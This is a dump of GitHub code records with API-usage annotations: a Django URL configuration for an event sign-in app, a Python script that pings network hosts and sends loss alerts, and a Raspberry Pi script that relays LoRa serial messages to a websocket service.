"lsst.ts.wep.utils.FilterType", "line_number": 325, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_G", "line_number": 327, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 327, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_R", "line_number": 329, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 329, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_I", "line_number": 331, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 331, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_Z", "line_number": 333, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 333, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_Y", "line_number": 335, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 335, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 303, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 341, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 342, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 395, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 442, "usage_type": "call"}, {"api_name": "os.path", "line_number": 442, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 445, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 449, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 449, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 460, "usage_type": "attribute"}, {"api_name": 
"lsst.ts.wep.utils.CamType", "line_number": 460, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 460, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 484, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 484, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 513, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 556, "usage_type": "call"}, {"api_name": "os.path", "line_number": 556, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 564, "usage_type": "call"}, {"api_name": "os.path", "line_number": 564, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.plot_fwhm_of_iters", "line_number": 565, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 569, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 570, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 608, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 608, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 610, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 610, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 612, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 612, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path", "line_number": 614, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_config_dir", "line_number": 614, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 621, "usage_type": "call"}, {"api_name": "os.path", "line_number": 621, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 640, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 640, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 644, "usage_type": "call"}, {"api_name": "os.path", "line_number": 644, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 651, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 651, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 651, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 654, "usage_type": "call"}, {"api_name": "os.path", "line_number": 654, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 657, "usage_type": "call"}, {"api_name": "os.path", "line_number": 657, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 658, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 680, "usage_type": "call"}, {"api_name": "os.path", "line_number": 680, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 695, "usage_type": "call"}, {"api_name": "os.path", "line_number": 695, "usage_type": "attribute"}, 
{"api_name": "os.path.join", "line_number": 698, "usage_type": "call"}, {"api_name": "os.path", "line_number": 698, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 702, "usage_type": "call"}, {"api_name": "os.path", "line_number": 702, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 714, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 716, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 720, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 780, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 780, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 780, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 782, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 782, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 794, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 827, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 828, "usage_type": "call"}, {"api_name": "os.path", "line_number": 828, "usage_type": "attribute"}, {"api_name": "lsst.daf.butler.Butler", "line_number": 833, "usage_type": "call"}, {"api_name": "lsst.daf.butler", "line_number": 833, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 838, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 846, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 846, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 847, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 854, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 854, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 854, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 855, "usage_type": "call"}, {"api_name": "lsst.daf.butler.Butler", "line_number": 864, "usage_type": "call"}, {"api_name": "lsst.daf.butler", "line_number": 864, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 894, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.utils.SensorWavefrontError", "line_number": 798, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 905, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.getConfigDir", "line_number": 935, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 935, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamType", "line_number": 1036, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 1050, "usage_type": "call"}, {"api_name": "lsst.ts.imsim.imsim_cmpt.ImsimCmpt", "line_number": 1064, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1069, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1069, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1074, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1074, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1099, "usage_type": "name"}, 
{"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1114, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1139, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1140, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1141, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1142, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1143, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 1144, "usage_type": "call"}, {"api_name": "astropy.io.ascii.read", "line_number": 1147, "usage_type": "call"}, {"api_name": "astropy.io", "line_number": 1147, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1167, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1173, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1177, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1181, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 1192, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1192, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1192, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 1194, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 1194, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1195, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.runProgram", "line_number": 1199, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 1212, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1213, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1213, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 1214, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1214, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 1215, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 1217, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 1220, "usage_type": "name"}, {"api_name": "logging.INFO", "line_number": 1259, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 1319, "usage_type": "name"}]} +{"seq_id": "12236293187", "text": "\"\"\"guest URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. 
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\n# import the views module of the sign app\nfrom sign import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('index/', views.index), # add the index/ path config\n path('login_action/', views.login_action), # path the login form submits to\n path('event_manage/', views.event_manage), # event management page\n path('accounts/login/', views.index), # login\n path('search_name/', views.search_name), # search events by name\n path('search_phone/', views.search_phone), # search guests by phone number\n path('guest_manage/', views.guest_manage), # guests\n re_path('sign_index/(?P<eid>[0-9]+)/', views.sign_index), # sign-in\n re_path('sign_index_action/(?P<eid>[0-9]+)/', views.sign_index_action),\n path('logout/', views.logout), # logout\n path('api/', include('sign.urls', namespace=\"sign\")), # API root path\n]\n", "repo_name": "chenzy01/guest", "sub_path": "guest/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1555, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "sign.views.index", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "sign.views.login_action", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "sign.views.event_manage", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "sign.views.index", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "sign.views.search_name", "line_number": 27, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 27, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "sign.views.search_phone", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "sign.views.guest_manage", "line_number": 29, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 30, "usage_type": "call"}, {"api_name": "sign.views.sign_index", "line_number": 30, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 31, "usage_type": "call"}, {"api_name": "sign.views.sign_index_action", "line_number": 31,
"usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "sign.views.logout", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sign.views", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "73923844124", "text": "#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\r\nimport os,time,csv\r\nfrom multiprocessing.dummy import Pool as ThreadPool\r\n\r\n'''\r\n config files : ip.list , black.list , exclude\r\n'''\r\n\r\nHOSTS = {}\r\nBLACKLIST = {}\r\nINTERVAL = '0.1'\r\nCOUNT = '10'\r\nPATH = '/nms/bin/'\r\nNOW = time.strftime('%Y/%m/%d-%H:%M',time.localtime(time.time()))\r\n\r\ndef sping(ip):\r\n\t\"\"\" do ping, return a tuple \"\"\"\r\n\tglobal INTERVAL\r\n\tglobal COUNT\r\n\r\n\tdata = os.popen('ping '+ip+' -c '+COUNT+' -i '+INTERVAL).read()\r\n\tloss = data.split('%')[0].split(' ')[-1]\r\n\ttry:\r\n\t\trtt = data.split('min/avg/max/mdev =')[1].split()[0]\r\n\t\tmin, avg, max, mdev = rtt.split('/')\r\n\texcept:\r\n\t\tmin = avg = max = mdev = '0'\r\n\treturn (ip,loss,min,avg,max,mdev)\r\n\r\ndef globalVar(PATH):\r\n\t\"\"\" create {ip:hostname} and blacklist \"\"\"\r\n\tglobal HOSTS\r\n\tglobal BLACKLIST\r\n\r\n\tipfile = PATH.rstrip('/') + '/ip.list'\r\n\tblack = PATH.rstrip('/') + '/black.list'\r\n\texclude = PATH.rstrip('/') + '/exclude'\r\n\r\n\twith open(ipfile,'r') as data:\r\n\t\tfor i in data:\r\n\t\t\tip,name = i.split(',')\r\n\t\t\tHOSTS[ip.strip()]=name.strip()\r\n\ttry:\r\n\t\tblacklist = open(black,'r')\r\n\texcept:\r\n\t\tos.mknod(black)\r\n\t\tblacklist = open(black,'r')\r\n\tBLACKLIST = [i.split()[0].strip() for i in blacklist]\r\n\r\n\ttry:\r\n\t\texcludes = open(exclude,'r')\r\n\texcept:\r\n\t\tos.mknod(exclude)\r\n\t\texcludes = open(exclude,'r')\r\n\tfor i in excludes:\r\n\t\tBLACKLIST.append(i.strip())\r\n\r\ndef alert(msg, warn, type='both'):\r\n\t\"\"\" msg is (ip,loss,min,avg,max,mdev), from sping() \"\"\"\r\n\r\n\tip,loss,min,avg,max,mdev = msg\r\n\tnms = os.uname()[1]\r\n\ttpl = '%s:%s [%s] %s | %s%% | %sms' %(nms.strip().upper(),NOW,HOSTS[ip].strip().upper(),ip,loss,avg)\r\n\tlog = 'time=%s, ip=%s, loss=%s, min=%s, avg=%s, max=%s, mdev=%s' % (NOW,ip,loss,min,avg,max,mdev)\r\n\tlogging(log)\r\n\tif float(loss) > float(warn) and ip not in BLACKLIST:\r\n\t\tif type == 'mail':\r\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendmail.sh')\r\n\t\telif type == 'sms':\r\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendsms.sh')\r\n\t\telse:\r\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendmail.sh')\r\n\t\t\tos.popen('echo \"'+tpl+'\" | /nms/bin/syslog-sendsms.sh')\r\n\t\twrBlacklist(ip)\r\n\treturn tpl\r\n\r\ndef logging(log):\r\n\tfilename = time.strftime('%Y%m%d-%H%M',time.localtime(time.time()))\r\n\tpname = time.strftime('%Y%m%d',time.localtime(time.time()))\r\n\tlogpath = '/nms/log/sping/'+pname+'/'\r\n\tif os.path.exists(logpath):\r\n\t\tpass\r\n\telse:\r\n\t\tos.makedirs(logpath)\r\n\tos.system('echo \"'+log+'\" >> '+logpath+filename)\r\n\r\ndef wrBlacklist(ip):\r\n\tos.system('echo '+ip+' auto >> '+PATH.rstrip('/') + '/black.list')\r\n\r\ndef multiTask(count,ip_list):\r\n\t\r\n\twarn = '30'\r\n\taccess_warn = '70' \r\n\tnon_warn = '200'\r\n\r\n\tpool = ThreadPool(int(count))\r\n\tdatalist = pool.map(sping, ip_list)\r\n\r\n\tfor data in datalist:\n\t\tip = data[0] #sping() returns (ip,loss,min,avg,max,mdev)\n\t\tif HOSTS[ip].startswith('A_'): #ip.list column 2 starting with A_ marks an access switch\n\t\t\talert(data, access_warn)\n\t\telif HOSTS[ip].startswith('NO_'): #ip.list column 2 starting with NO_ suppresses alarms\n
\t\t\talert(data, non_warn)\n\t\telse:\n\t\t\talert(data, warn)\n\tpool.close()\n\tpool.join()\n\n\nif __name__ == '__main__':\n\tips = []\n\tglobalVar(PATH) #create a dict {ip,hostname} and a blacklist\n\tfor ip in HOSTS:\n\t\tips.append(ip)\n\n\tmultiTask(20,ips)\n\n\tif NOW.endswith('0'):\n\t\tos.system('cat /dev/null > '+PATH.rstrip('/')+'/black.list')\n", "repo_name": "gothack329/sirius.py", "sub_path": "s-ping-alert.py", "file_name": "s-ping-alert.py", "file_ext": "py", "file_size_in_byte": 3197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "time.strftime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.time", "line_number": 16, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 23, "usage_type": "call"}, {"api_name": "os.mknod", "line_number": 48, "usage_type": "call"}, {"api_name": "os.mknod", "line_number": 55, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 64, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 70, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 72, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 74, "usage_type": "call"}, {"api_name": "os.popen", "line_number": 75, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 80, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 80, "usage_type": "call"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 86, "usage_type": "call"}, {"api_name": "os.system", "line_number": 87, "usage_type": "call"}, {"api_name": "os.system", "line_number": 90, "usage_type": "call"}, {"api_name": "multiprocessing.dummy.Pool", "line_number": 98, "usage_type": "call"}, {"api_name": "os.system", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "13800087025", "text": "#!/usr/bin/env python3\nimport os\nimport errno\nimport time\nfrom threading import Thread\nimport json\nimport string\nimport serial\nimport RPi.GPIO as GPIO\nimport websocket\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n \n#OnlineDB.NET API KEY \n\nOnlineDBKEY = '<YOUR_API_KEY>'\n\n\n#input pipe\n#you can send JSON messages to arduino nodes by writing commands in pipe\n#\n# For instance:\n# echo -n \"{\\\"a\\\":\\\"report\\\",\\\"d\\\":\\\"all\\\",\\\"w\\\":1}\" > /tmp/loraflow\n# w - wake up\n\nFIFO = '/tmp/loraflow'\n\n\n\nser = serial.Serial(\n port='/dev/ttyS0', #might be port='/dev/ttyAMA0' as well\n #port='/dev/ttyAMA0',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n)\n\n\n#RPi pins\nM0 = 17\nM1 = 27\n\n\n# global variables\npipeMsg = \"\";\n\n\n\ndef set_lora_module_normal_mode():\n GPIO.setmode(GPIO.BCM)\n #set lora module to normal mode\n GPIO.setup(M0,GPIO.OUT)\n GPIO.setup(M1,GPIO.OUT)\n\n GPIO.output(M0,GPIO.LOW)\n GPIO.output(M1,GPIO.LOW)\n \n \ndef set_lora_module_to_wake_up_other():\n GPIO.setmode(GPIO.BCM)\n #add wakeup packet, because arduino lora module is sleeping\n 
GPIO.setup(M0,GPIO.OUT)\n GPIO.setup(M1,GPIO.OUT)\n\n GPIO.output(M0,GPIO.HIGH)\n GPIO.output(M1,GPIO.LOW)\n\n #send whitespaces to wake up node\n ser.write(\" \".encode('ascii'));\n ser.flush()\n\ndef pipe_thread(threadname):\n global pipeMsg\n try:\n os.mkfifo(FIFO, 0o777)\n except OSError as oe:\n if oe.errno != errno.EEXIST:\n raise\n\n os.chmod(FIFO,0o777)\n\n while True:\n with open(FIFO) as fifo:\n while True:\n data = fifo.read()\n if len(data) == 0:\n break\n pipeMsg = data\n \n\ndef send_lora_msg( msg ):\n print(msg)\n \n\ndef clean_string( strg ): \n newstrg = \"\"\n acc = \"\"\" '\",{}[].`;:_-<> \"\"\"\n for x in strg:\n if x in string.ascii_letters or x in string.digits or x in acc:\n newstrg += x\n return newstrg\n\n \n\ndef serial_thread(threadname):\n global pipeMsg\n global lastValidSerialMsg\n global ws\n \n while True:\n \n #SERIAL READ\n \n data = ser.readline()\n serialMsg = data.decode('ascii','ignore')\n \n if serialMsg != \"\" :\n \n print('Got lora msg: \"{0}\"'.format(serialMsg))\n \n serialMsg = clean_string(serialMsg)\n #ensure that we have json with double quotes\n serialMsg = serialMsg.replace('\\'','\\\"')\n\n try:\n jsonData = json.loads(serialMsg)\n lastValidSerialMsg = json.dumps(jsonData);\n try:\n print('Sending lora msg to socket \"{0}\"'.format(json.dumps(jsonData)))\n ws.send(lastValidSerialMsg)\n except Exception as ex:\n print(\"looks like websocket is down\")\n \n except ValueError:\n print('Decoding JSON has failed')\n \n \n #SERIAL WRITE\n \n if pipeMsg != \"\" :\n print('Recieved message from pipe: \"{0}\"'.format(pipeMsg))\n \n #check if json has wake up flag -> \"w\":1\n #we should remove it before passing to lora node as it is not neccessary for node\n try:\n jsonData = json.loads(pipeMsg)\n if (\"w\" in jsonData) and (jsonData[\"w\"] == 1) :\n print(\"Setting wake-up mode\");\n set_lora_module_to_wake_up_other()\n jsonData.pop('w', None) #remove w field\n except ValueError:\n print('Decoding JSON has failed')\n \n \n msgToSend = str(jsonData)\n \n print('Going to send message to lora module: \"{0}\"'.format(msgToSend))\n \n ser.write(msgToSend.encode('ascii'))\n \n ser.flush()\n set_lora_module_normal_mode()\n pipeMsg = \"\"\n \n time.sleep(0.1)\n \n \n#SOCKET RELATED\n\ndef on_message(ws, message):\n global pipeMsg\n global lastValidSerialMsg\n if message != lastValidSerialMsg :\n pipeMsg = message\n \n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### ws closed ###\")\n\ndef on_open(ws):\n print(\"### ws opened ###\")\n\n\ndef websocket_thread(threadname):\n global ws\n while 1:\n ws = websocket.WebSocketApp(\"ws://www.onlinedb.net/\" + str(OnlineDBKEY) + \"/socket/\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()\n time.sleep(10)\n print(\"Reconnecting to websocket...\");\n\n\n\nthread1 = Thread( target=pipe_thread, args=(\"Pipe Thread\", ) )\nthread1.start()\n\nthread2 = Thread( target=serial_thread, args=(\"Serial Thread\", ) )\nthread2.start()\n\nthread3 = Thread( target=websocket_thread, args=(\"WebSocket Thread\", ) )\nthread3.start()\n\nthread1.join()\nthread2.join()\nthread3.join()\n\n", "repo_name": "loraflow-net/loraflow", "sub_path": "loraflow.py", "file_name": "loraflow.py", "file_ext": "py", "file_size_in_byte": 5271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "serial.Serial", "line_number": 32, "usage_type": "call"}, {"api_name": 
"serial.PARITY_NONE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "serial.STOPBITS_ONE", "line_number": 37, "usage_type": "attribute"}, {"api_name": "serial.EIGHTBITS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setmode", "line_number": 54, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 54, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 54, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 56, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 56, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 57, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 57, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 59, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 59, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 59, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 60, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 60, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 60, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setmode", "line_number": 64, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 64, "usage_type": "name"}, {"api_name": "RPi.GPIO.BCM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 66, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 66, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 66, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 67, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 67, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 69, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 69, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 69, "usage_type": 